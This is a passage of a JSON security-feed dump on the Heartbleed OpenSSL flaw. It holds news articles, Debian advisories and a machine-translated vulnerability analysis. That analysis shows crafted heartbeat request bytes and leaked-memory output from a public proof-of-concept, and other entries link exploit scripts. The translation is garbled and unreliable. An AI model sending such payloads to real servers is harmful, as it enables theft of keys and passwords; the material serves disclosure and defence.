'_**heartbeats**_' that keep informing the server that client (computer) is online (alive).\n\n \n\n\nHeartbleed attack allows an attacker to retrieve a block of memory of the server up to 64kb in response directly from the vulnerable server via sending the malicious heartbeat and there is no limit on the number of attacks that can be performed. [Technically Explained by Rahul Sasi on [Garage4hackers](<http://www.garage4hackers.com/entry.php?b=2551>)]\n\n \n\n\nIt opens doors for the cyber criminals to extract sensitive data directly from the server's memory without leaving any traces.\n\n[](<https://2.bp.blogspot.com/-0_DevhynabI/U0zUQQ-yUXI/AAAAAAAAbN8/UurRUbKnZbc/s1600/heartbleed_explanation.png>) \n--- \n_xkcd comic http://xkcd.com/1354/_ \n**3.) HEARTBLEED ATTACK RELIES ON MAN-IN-THE-MIDDLE ATTACK?**\n\nNo, it has nothing to deal with a Man-in-the-Middle (MitM) attack. But using Heartbleed attack, one can manage to obtain the private encryption key for an SSL/TLS certificate and could set up a fake website that passes the security verification.\n\n \n\n\nAn attacker could also decrypt the traffic passing between a client and a server i.e. Perfect man-in-the-middle attack on HTTPS connection.\n\n \n\n\n**4.) IS IT A CLIENT SIDE OR SERVER SIDE VULNERABILITY?**\n\nTLS heartbeats can be sent by either side of a TLS connection, so it can be used to attack clients as well as servers. An Attacker can obtain up to 64K memory from the server or client as well that uses an OpenSSL implementation vulnerable to Heartbleed (_CVE-2014-0160_).\n\n \n\n\nResearcher [estimated](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>) two-thirds of the world's servers i.e. half a million servers are affected by the Heartbleed Bug, including websites, email, and instant messaging services.\n\n \n**Video Explanation:** \n\n\n**5.) HOW HEARTBLEED AFFECTS SMARTPHONES?**\n\nSmartphone is the best practical example of Client side attacks.\n\n \n\n\nAll versions of Android OS include outdated versions of OpenSSL library, but only Android 4.1.1 Jelly Bean has the vulnerable heartbeat feature enabled by default. Blackberry also [confirmed](<https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html>) that some of its products are vulnerable to Heartbleed bug, whereas Apple's iOS devices are not affected by OpenSSL flaw.\n\n \n\n\nGoogle had patched the affected version Android 4.1.1, but it will take long time to deliver updated Android version to the end Smartphone users as updates to majority handsets are controlled by phone manufacturers and wireless carriers. Until users running the affected versions are vulnerable to the attacks, and hackers will definitely take advantage of this public disclosure.\n\n \n\n\n**6.) WHAT ELSE COULD BE VULNERABLE TO HEARTBLEED?**\n\nIP phones, Routers, Medical devices, Smart TV sets, embedded devices and millions of other devices that rely on the OpenSSL to provide secure communications could also be vulnerable to Heartbleed bug, as it is not expected for these devices to get the updates soon from Google\u2019s Android partners.\n\n \n\n\nYesterday, Industrial Control Systems-CERT also [warned](<http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01B>) the critical infrastructure organizations (like energy, utilities or financial services companies) to beef-up their systems in order to defend against the Heartbleed attacks.\n\n \n\n\n**7.) WHO IS RESPONSIBLE FOR HEARTBLEED?**\n\nWe actually can't blame anyone developer, specially who are contributing to Open Source projects without money motivations. \n\n \n\n\nDr. Robin Seggelmann, a 31-year-old German developer who actually introduced the Heartbeat concept to OpenSSL on New Year's Eve, 2011, says it was just a programming error in the code that unintentionally created the \u201c_Heartbleed_\u201d vulnerability.\n\n \n\n\n\"_In one of the new features, unfortunately, I missed validating a variable containing a length_\", went undetected by the code reviewers and everyone else for over two years. He [claimed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) '_I did so unintentionally_'.\n\n \n\n\n**8.) WHO HAS EXPLOITED THIS BUG YET?**\n\nBloomberg accused the National Security Agency (NSA) of knowing the Heartbleed bug for the last two years. Not even this, the report says the agency was using it continuously to gain information instead of disclosing it to the OpenSSL developers. But if it is so, then this would be one of the biggest developments in the history of wiretapping ever. However, the agency [denied](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>) it saying NSA was not aware of Heartbleed until it was made public.\n\n \n\n\nBut when it comes to exploit any known vulnerability, then Hackers are most likely to be top on the list. As the flaw was so widely spread that it affected half a million websites worldwide, so after the public disclosure, the cybercriminals could reach the sites to steal credentials, passwords and other data, before the site operators apply the freely available patch.\n\n \n\n\nThere are multiple Proof-of-concept exploits available for the Heartbleed flaw:\n\n * [Python Script](<https://gist.github.com/mpdavis/10171593>)\n * [Metasploit Module](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * [C Code](<https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c>)\n * [NMAP script](<https://github.com/sensepost/heartbleed-poc>)\n * [Python Script by Rahul Sasi](<https://bitbucket.org/fb1h2s/cve-2014-0160/src/2b1fff1a62e29397ff60586557c96989c7b64662/Heartbeat_scanner.py?at=master>)\n\n**9.) CHANGING ACCOUNT PASSWORDS CAN SOLVE THE ISSUE?**\n\nNot exactly, as Heartbleed attack has the ability to leak anything from the server including your passwords, credit card details or any kind of personal information. But, in order to protect your online accounts you should at least change your passwords immediately for the sites that resolved the issue and for the sites not affected by the bug as well, just to make sure that you are safe.\n\n \n\n\nFirst of all check if the sites you use every day on an individual basis are vulnerable to Heartbleed bug or not using following services or apps:, and if you're given a red flag, avoid the site for now.\n\n * [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>)\n * [Provensec Scanner](<http://provensec.com/heartbleed/>)\n * [GlobalSign SSL Configuration Checker](<https://sslcheck.globalsign.com/>)\n * [ADTsys Checker](<http://seguranca.adtsys.com.br/>)\n * The easiest way to keep you safe is to use a new add-on to the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher, Jamie Hoyle.\n * To check whether your Android devices are safe or not, you can install the [Bluebox Heartbleed Scanner](<https://play.google.com/store/apps/details?id=com.bblabs.heartbleedscanner>) available on the Google Play Store. The Bluebox Heartbleed Scanner looks for apps installed on your device that have bundled their own version of OpenSSL and the scanner also checks the version of the library and whether heartbeat is enabled or not.\n\nWell, nobody is sure at this point, because Heartbleed is stealthy as it leaves no traces behind and here the matter goes worse.\n\n \n\n\nYou may never know if you have been hacked using the flaw or not. This means that there is no way to tell if your information was stolen previously from a site or a service that has now fixed it.\n\n \n\n\nBut if you haven't change the password to the popular sites yet, then yes, your password and financial information are still widely open to cybercriminals and other spying agencies.\n\n \n\n\n**10.) WHAT SHOULD I DO TO PROTECT MYSELF?**\n\nFirst of all DON'T PANIC. You have to change your password everywhere, assuming that it was all vulnerable before, just to make sure that you are now safe. But hold on... If some sites are still affected by the flaw then your every effort is useless, as it\u2019s up to the site to first fix the vulnerability as soon as possible , because changing the password before the bug is fixed could compromise your new password as well. \n \nIf you own a vulnerable SSL Service, then you are recommended to: \n\n\n * Upgrade the OpenSSL version to [1.0.1g](<https://www.openssl.org/source/>)\n * Request revocation of the current SSL certificate\n * Regenerate your private key\n * Request and replace the SSL certificate\n\nDon't reuse any old passwords and it is good practice to use two-factor authentication, which means with the password, the account requires a freshly generated pass code that shows up only on your personal smartphone, before getting into certain sites. \n \nStay Safe! \n\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "modified": "2014-04-17T10:28:24", "published": "2014-04-14T20:40:00", "id": "THN:244769C413FFA5BE647D8F6F93431B74", "href": "https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html", "type": "thn", "title": "HeartBleed Bug Explained - 10 Most Frequently Asked Questions", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-3SCoP4FOfiE/U0RKMR7pksI/AAAAAAAAbHo/1YEQztc6eEw/s1600/OpenSSL-Heartbleed-vulnerability-CVE-2014-0160.png>)\n\nIt is advised to those who are running their web server with OpenSSL 1.0.1 through 1.0, then it is significantly important that you update to OpenSSL 1.0.1g immediately or as soon as possible. \n\n \n\n\nAs this afternoon, an extremely critical programming flaw in the OpenSSL has been discovered that apparently exposed the cryptographic keys and private data from some of the most important sites and services on the Internet.\n\n \n\n\nThe bug was independently discovered by security firm _[Codenomicon](<http://www.codenomicon.com/>)_ along with a Google Security engineer. The flaw is in the popular OpenSSL cryptographic software library and its weakness allows cyber criminals to steal the information protected, under normal conditions, by the SSL (Secure Sockets Layer) or TLS (Transport Security Layer) [encryption](<https://thehackernews.com/search/label/encryption>) used to secure the Internet.\n\n \n\n\nOpenSSL is an open-source implementation of the SSL and TLS protocols. The core library implements the basic cryptographic functions that enable SSL and TLS encryption. Mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.\n\n \n\n\n**HEARTBLEED BUG**\n\nThe discoverer of the vulnerability dubbed the bug as \u2018_[Heartbleed bug](<http://heartbleed.com/>)_\u2019, as the exploit rests on a bug in the implementation of OpenSSL\u2019s TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520).\n\n \n\n\nThis critical bug with code ID_ CVE-2014-0160_, could allows an attacker to expose up to 64kB of memory from the server or a connected client computer running a vulnerable version of OpenSSL software. Specifically, this means that an attacker can steal keys, passwords and other private information remotely.\n\n \n\n\n\u201c_We have tested some of our own services from attacker\u2019s perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, usernames and passwords, instant messages, emails and business critical documents and communication_.\u201d\n\n \n\n\nThe [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) in the OpenSSL\u2019s transport layer security (TSL) protocols\u2019 heartbeat section has been in the wild since March 2012 and is supposed to be even more dangerous than [Apple\u2019s recent SSL bug](<https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html>), which outcropped the possibility for man-in-the-middle (MitM) attacks.\n\n \n\n\nAs the Heartbleed bug reveals encryption keys that could lead to other compromises, affects past traffic and may affect as much as 66 percent of Internet websites over the internet. 10 out of top 1000 sites are vulnerable to this flaw, including Yahoo Mail, Lastpass and the FBI site. There also is a proof-of-concept exploit for the flaw [posted on Github](<https://gist.github.com/takeshixx/10107280>). On this [website](<https://filippo.io/Heartbleed/>), you can check if your web server is vulnerable or not.\n\n \n\n\n\"_Bugs in single software or library come and go and are fixed by new versions,_\" the researchers who discovered the vulnerability wrote in a blog post published Monday. \"_However this bug has left a large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, ease of exploitations and attacks leaving no trace this exposure should be taken seriously._\"\n\n \n\n\nFixes for the bug have been released by the researchers. So, who are running the OpenSSL 1.0.1f version may update to [OpenSSL 1.0.1g](<https://www.openssl.org/>). The users running older version of OpenSSL are safe. \n \n**Related Important Articles:** \n \n \n \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "modified": "2014-04-12T09:01:01", "published": "2014-04-08T08:23:00", "id": "THN:0F7112302CBABF46D19CACCCFA6103C5", "href": "https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html", "type": "thn", "title": "Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-YQ3pfHXH8Vc/U0kTASBjW0I/AAAAAAAAbLs/0VNzJlaw61E/s1600/NSA-Heartbleed-vulnerability.jpg>)\n\nThe Bloomberg [claimed](<http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html>) that the U.S. National Security Agency (NSA) knew about the most critical Heartbleed flaw and has been using it on a regular basis to gather \u201c_critical intelligence_\u201d and sensitive information for at least past two years and decided to keep the bug secret, citing two sources \u2018_familiar with the matter_\u2019.\n\n \n\n\nIn response to the above report, NSA has issued a '_94 character'_ statement today denying the claims that it has known about the Heartbleed bug since two years and that it has been using it silently for the purpose of surveillance.\n\n \n\n\n\"_NSA was not aware of the recently identified Heartbleed vulnerability until it was made public_,\" the U.S. intelligence agency said on its [Twitter feed](<https://twitter.com/NSA_PAO/status/454720059156754434>).\n\n \n\n\n[Heartbleed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) is one of the biggest Internet vulnerabilities in recent history that left large number of cryptographic keys and private data such as usernames, passwords, and credit card numbers, from the most important sites and services on the Internet open for hackers. \n\n \n\n\nThe bug resides in the \"_Heartbeat_\" feature of the most secured open source encryption protocol, OpenSSL, which is used by several social networks, search engines, banks and other websites to enable secure connections while transmitting data.\n\n \n\n\nA team of researchers from Codenomicon and Google Security researcher revealed the vulnerability this week that is in the wild since the new version 1.0.1f was released in March 2012. And just after the revelation, OpenSSL released the security Fix for the bug in its version 1.0.1g, but until then the Heartbleed bug made websites, email, instant messaging (IM), including some virtual private networks, on about half a million of the world's widely trusted web servers, open to hackers.\n\n \n\n\nThe birth of the most critical bug Heartbleed was due to a mistake done by a German programmer [Robin Seggelmann](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) over two years ago while working on a new Heartbeat feature in the OpenSSL.\n\n \n\n\nHe submitted the code of OpenSSL with the heartbeat feature in an update on New Year's Eve, 2011, and an \u201c_oversight_\u201d led to an error that unintentionally created the \u201c**Heartbleed**\u201d vulnerability.\n\n \n\n\nYesterday he said it could be entirely possible that the government intelligence agencies had been making use of this critical flaw over the past two years.\n\n \n\n\nThe fix was released just after, but the users\u2019 data are vulnerable until the vulnerable websites didn\u2019t implement it. You can only change your password immediately for those websites that are not affected, assuming that it was vulnerable before, just to make sure that you are now safe.\n\n \n\n\n**Related Important Articles:**\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "modified": "2014-04-12T10:21:51", "published": "2014-04-11T23:21:00", "id": "THN:EBCB003D7DB7BD8BF73239F9718C6126", "href": "https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html", "type": "thn", "title": "NSA denies Report that Agency knew and exploited Heartbleed Vulnerability", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:03", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-eqXY6SQWOkQ/WIXZQiMLlTI/AAAAAAAArJA/-0BiAp9seZgDvkXXXuhbrQYOG1h5FpVtACLcB/s1600/heartbleed-openssl-vulnerability.png>)\n\nIt's more than two and half years since the discovery of the critical [OpenSSL Heartbleed vulnerability](<https://thehackernews.com/2014/04/hacker-exploits-heartbleed-bug-to.html>), but the flaw is still alive as it appears that many organizations did not remediate properly to the serious security glitch. \n \nIt was one of the biggest flaws in the Internet's history that affected the core security of as many as two-thirds of the world's servers i.e. half a million servers at the time of its discovery in April 2014. \n \nHowever, the critical bug still affects more than 199,500 systems even after 2 years and 9 months have already passed, according to a [new report](<https://www.shodan.io/report/DCPO7BkV?utm_campaign=news-alert&utm_medium=email&utm_source=app>) published today on Shodan, a search engine that scans for vulnerable devices. \n \n\n\n### Over 199,500 Systems Still Vulnerable to Heartbleed\n\n \n[Heartbleed](<https://thehackernews.com/2014/04/several-tor-exit-nodes-vulnerable-to.html>) (CVE-2014-0160) was a serious bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allowed [attackers to read portions](<https://thehackernews.com/2014/04/19-year-old-teenager-arrested-for_16.html>) of the affected server\u2019s memory, potentially revealing users data that the server isn't intended to reveal. \n \nAccording to Shodan CEO John Matherly, about 199,500 services remain exploitable by the Heartbleed vulnerability due to unpatched OpenSSL instances. \n \nThe countries most affected by Heartbleed still remain the United States, followed by Korea, China, Germany, France, Russian Federation, United Kingdom, India Brazil and Italy. \n \nMatherly discovered 42,032 heartbleed-exploitable services in the United States, 15,380 in Korea, 14,116 in China, and 14,072 services in Germany. \n \nWith top organizations vulnerable to the OpenSSL bug is SK Broadband and Amazon.com, and about 75,000 of the vulnerable services use expired SSL certificates and run Linux 3.x. \n \n[Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>) is one of many flaws that often exist unpatched in the wild, and now that the bug has been more than two and half years old and known to everybody, anyone can simply use it to carry out attacks against the still affected systems. \n \nAround 200,000 is really a troubling number, and one can imagine the danger and damages caused by the bug if exploited. \n \nSoftware bugs may come and go, but this flaw is more critical and probably the biggest Internet flaw in recent history as it left the contents of a server's memory, where the most sensitive data is stored, exposed to the attackers. \n \n\n\n### What are the Steps to Protect your Systems against Heartbleed?\n\n \nIt takes roughly three steps to remediate the Heartbleed bug. \n \n\n\n 1. **Patching**: Update your software to the latest versions of OpenSSL; thankfully almost all organization have accomplished this step.\n 2. **Creation of New Private Keys**: Creating new private keys will prevent an attacker, who already exploited the flaw before patching, from being able to spy on your encrypted.\n 3. **Reissuance of Security Certificates**: This step will eliminate the ability of any attacker to spoof organizations and fool or phish their customers.\n", "modified": "2017-01-23T10:35:46", "published": "2017-01-22T23:27:00", "id": "THN:847F48AE6816E6BFF25355FC0EA7439A", "href": "https://thehackernews.com/2017/01/heartbleed-openssl-vulnerability.html", "type": "thn", "title": "Over 199,500 Websites Are Still Vulnerable to Heartbleed OpenSSL Bug", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "debian": [{"lastseen": "2019-05-30T02:21:22", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2896-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nApril 07, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0160\nDebian Bug : 743883\n\nA vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Hearbeat extension. Up to 64KB of memory from either client or\nserver can be recovered by an attacker This vulnerability might allow an\nattacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-04-07T21:37:07", "published": "2014-04-07T21:37:07", "id": "DEBIAN:DSA-2896-1:7AEC1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00071.html", "title": "[SECURITY] [DSA 2896-1] openssl security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:22:16", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2896-2 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nApril 08, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0160\n\nThis revision to the recent OpenSSL update, DSA-2896-1, checks for some\nservices that may use OpenSSL in a way that they expose the\nvulnerability. Such services are proposed to be restarted during the\nupgrade to help in the actual deployment of the fix.\n\nThe list of services that are checked is not comprehensive. For a more\ndetailed check, it is recommended to use the checkrestart tool from the\ndebian-goodies package. Note that client applications also need to be\nrestarted.\n\nIn case of doubt a full system restart is recommended.\n\nFor reference, the original advisory text follows.\n\nA vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Hearbeat extension. Up to 64KB of memory from either client or\nserver can be recovered by an attacker. This vulnerability might allow\nan attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u6.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-04-08T13:47:33", "published": "2014-04-08T13:47:33", "id": "DEBIAN:DSA-2896-2:FEB91", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00072.html", "title": "[SECURITY] [DSA 2896-2] openssl security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "myhack58": [{"lastseen": "2016-11-02T19:48:51", "bulletinFamily": "info", "description": "Author: yaoxi original source http://blog.wangzhan.360.cn/\n\nRecently, OpenSSL broke this year's most serious security vulnerability in the hacker community is named\u201cheart bleed\u201dvulnerability. 3 6 0 site Guard security team of the vulnerability analysis, the vulnerability is not only related to https at the beginning of the URL, but also includes indirect use of the OpenSSL code products and services, such as VPN, mail system, FTP tools and other products and services, and may even be related to some other security facilities of the source code.\n\nThe affected version\n\nOpenSSL1. 0. 1, The 1.0.1 a, 1.0.1 b, 1.0.1 c, 1.0.1 d, 1.0.1 e, 1.0.1 f, Beta 1 of OpenSSL 1.0.2 and other versions.\n\nVulnerability detail description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n\nVulnerability description\n\nOpenSSL in the realization of the TLS and DTLS heartbeat processing logic, the presence of coding defects. OpenSSL's heartbeat processing logic does not detect a heartbeat packet in the length field and subsequent data fields are consistent, the attacker can take advantage of this, structural abnormalities of the data packet, to obtain the heartbeat data where the memory area of the subsequent data. These data may be contained in a certificate private key, user name, user password, user email and other sensitive information. The vulnerability allows an attacker read from memory up to 64KB of data.\n\nA few days ago of a vulnerability analysis of the articles the main focus in turn on HTTPS on the site, ordinary users may think that only the website their business will be affected by this vulnerability. From 3 6 0 websites guards Openssl effort loophole online testing platform(wangzhan. 3 6 0. cn/heartbleed)monitoring data that, effort to exploit the range of radiation has been from the open HTTPS site extends to the VPN system and the mail system, The current Total Domestic total 2 5 1 a VPN system and a 7 2 5 a mail system to the presence of the same vulnerability, including many government websites, key universities and related security vendors.\n\nIn order to better allow everyone to understand that the Openssl effort loophole in the end is which aspects of a problem, we use the OpenSSL lib library to write a does not depend on any business separate server program, a step-by-step the actual debug over the code, in order to prove that not only is the https site has a problem, as long as the use of the existence of the vulnerability in the OpenSSL libssl. so the gallery app there are security vulnerabilities that!\n\nThe test environment\n\nOS: CentOS release 6.4 (Final)\n\nOpenSSL: Version 1.0.1 f Do not open the OPENSSL_NO_HEARTBEATS compile options\n\nWrite a Server program: monitor port 9 8 7 6\n\nVulnerability testing\n\nUse the online python validation script https://gist.github.com/RixTox/10222402 test\n\nStructural abnormalities of the heartbeat data packet, mainly to add the exception of the length field value.\n\nTest one:\n\nHeartBeat Requst packet\n\nhb = h2bin(\u201d\u2019\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 2 0 0 0\n\n\u201d\u2019)\n\nBlue 0 1 represents the heartbeat packet of type request direction. The corresponding source code is #define TLS1_HB_REQUEST 1\n\nRed 2 0 0 0 indicates that the heartbeat request packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of.\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... received message: type = 2 4, ver = 0 3 0 2, length = 8 2 1 1\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 2 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C. .... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nBlue 0 2 represents the heartbeat packet type response direction.\n\nThe corresponding source code is #define TLS1_HB_RESPONSE 2\n\nRed 2 0 0 0 represented by the heartbeat response packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of. And the request packet length value.\n\nThe green part is the illegal access to cross-border data(which may include Username, Password, e-mail, internal network IP and other sensitive information).\n\nTest two:\n\nIn the test on the basis of one, modify the request heartbeat packets, the length field's value from 2 to 0 0 0 to 3 0 0 0\n\nHeartBeat Requst packet\n\nhb = h2bin(\"'\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 3 0 0 0\n\n\"')\n\n3 0 0 0 two bytes corresponding to the length 1 2 2 8 8 out of 8 1 9 2+4 0 9 6\uff09\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... received message: type = 2 4, ver = 0 3 0 2, length = 1 2 3 0 7\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 3 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C .0.... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nTwo test cases, the response of the length of the length value is always greater than the request length of the multi-out 1 9 a byte, why?\n\nBecause, TLS and DTLS in dealing with the type of TLS1_HB_REQUEST the heartbeat request packet logic, from the heap space on the application memory size, there are 4 part of the decision type+length+request data length+pad, where type,length,pad the field into account for 1byte and 2byte, the 16byte, so the response data is always better than the request of many out 19byte it.\n\nSource code analysis\n\nOutline\n\nThe vulnerability is mainly a memory leak problem, and the fundamental is because OpenSSL in the handling heartbeat request packet, not to the length field for 2byte, you can identify the data length is 64KB and the subsequent data fields do compliance testing. Generate a heartbeat response packet, the direct use of a length corresponding to the length from heap space application memory, not only is the real request data is much smaller than the length identified in length.\n\nRelated to parsing the source code description\n\nThe vulnerability exists in the source file there are two ssl/d1_both. c and ssl/t1_lib. c.\n\nHeartbeat processing logic, respectively, is dtls1_process_heartbeat and tls1_process_heartbeat two functions.\n\ndtls1_process_heartbeat function processing logic:\n\nStep1. Get heartbeat request packet corresponding to the SSLv3 record the data in the pointer field pointing to the request of the requested data portion.\n\nunsigned char *p = &s->s3->rrec. data[0];\n\nrecord the data format should contain three fields: type, length, data; respectively accounted for 1byte and 2byte, the length of the actual value.\n\n**[1] [[2]](<44409_2.htm>) [next](<44409_2.htm>)**\n", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "MYHACK58:62201444409", "href": "http://www.myhack58.com/Article/html/3/62/2014/44409.htm", "type": "myhack58", "title": "Than imagined more terror! OpenSSL\u201ceffort\u201dvulnerability in-depth analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "suse": [{"lastseen": "2016-09-04T11:46:33", "bulletinFamily": "unix", "description": "This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages 